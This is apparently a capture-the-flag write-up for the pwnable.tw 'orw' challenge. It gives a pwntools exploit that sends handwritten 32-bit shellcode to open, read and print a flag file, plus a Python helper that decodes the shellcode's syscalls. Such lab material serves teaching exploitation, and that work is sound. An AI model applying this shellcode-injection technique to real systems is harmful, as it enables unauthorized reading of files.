This challenge tests our ability to write shellcode by hand. Note the calling conventions:
For 32-bit programs, enter the kernel with int $0x80: the system call number goes in eax, the arguments are passed in the registers ebx, ecx, edx in that order, and the return value comes back in eax.
For 64-bit programs, enter the kernel with syscall: the system call number goes in rax, the arguments are passed in the registers rdi, rsi, rdx in that order, and the return value comes back in rax.
exp:
from pwn import *
context.binary = './orw'
#p = process('./orw')
p = remote('chall.pwnable.tw', 10001)
shellcode = asm(
#fd = open('/home/orw/flag',0)
'''
push 0x00006761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;
mov ecx, 0x0;
mov ebx, esp;
mov eax, 0x5;
int 0x80;
'''
#read(fd,bss+0x200,0x40)
'''
mov ebx, eax;
mov ecx, 0x0804A260;
mov edx, 0x40;
mov eax, 0x3;
int 0x80;
'''
#write(1,bss+0x200,0x40)
'''
mov ebx, 0x1;
mov ecx, 0x0804A260;
mov edx, 0x40;
mov eax, 0x4;
int 0x80;
'''
)
p.sendline(shellcode)
p.interactive()
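To check that handwritten shellcode like the above really does what its comments claim (the same step an analyst applies when decoding a captured sample), here is an added helper that is not part of the original writeup: it walks the assembly text, rebuilds the string left on the stack by the push immediates, and names each int 0x80 from the value in eax. The syscall-number table and the SAMPLE_ASM string are constructed here from the page's own shellcode.

```python
import re
import struct

# i386 syscall numbers used by the page's shellcode (from asm/unistd_32.h).
SYSCALL_NAMES_I386 = {3: "read", 4: "write", 5: "open"}

# Constructed sample: the page's shellcode, statements separated by ';'.
SAMPLE_ASM = (
    "push 0x00006761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f;"
    " mov ecx, 0x0; mov ebx, esp; mov eax, 0x5; int 0x80;"
    " mov ebx, eax; mov ecx, 0x0804A260; mov edx, 0x40; mov eax, 0x3; int 0x80;"
    " mov ebx, 0x1; mov ecx, 0x0804A260; mov edx, 0x40; mov eax, 0x4; int 0x80;"
)

def decode_pushed_string(immediates):
    """Rebuild the string left on the stack by a run of `push imm32`.
    Pushes are given in program order; the stack grows downward, so the
    last push lands at the lowest address and the string starts there."""
    raw = b"".join(struct.pack("<I", imm) for imm in reversed(immediates))
    return raw.split(b"\0", 1)[0].decode("ascii")

def summarize_syscalls(asm_text):
    """Collect pushed immediates and the value loaded into eax, then report
    each `int 0x80` as (syscall name, string pushed before it or None)."""
    pushes, eax, calls = [], None, []
    for stmt in re.split(r"[;\n]", asm_text):
        stmt = stmt.strip()
        if not stmt:
            continue
        if m := re.fullmatch(r"push\s+(0x[0-9a-fA-F]+)", stmt):
            pushes.append(int(m.group(1), 16))
        elif m := re.fullmatch(r"mov\s+eax,\s*(0x[0-9a-fA-F]+|\d+)", stmt):
            eax = int(m.group(1), 0)  # eax holds the syscall number
        elif stmt == "int 0x80":
            name = SYSCALL_NAMES_I386.get(eax, f"unknown({eax})")
            arg = decode_pushed_string(pushes) if pushes else None
            calls.append((name, arg))
            pushes, eax = [], None  # start fresh for the next call
    return calls

if __name__ == "__main__":
    # Expected: [('open', '/home/orw/flag'), ('read', None), ('write', None)]
    print(summarize_syscalls(SAMPLE_ASM))
```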
References: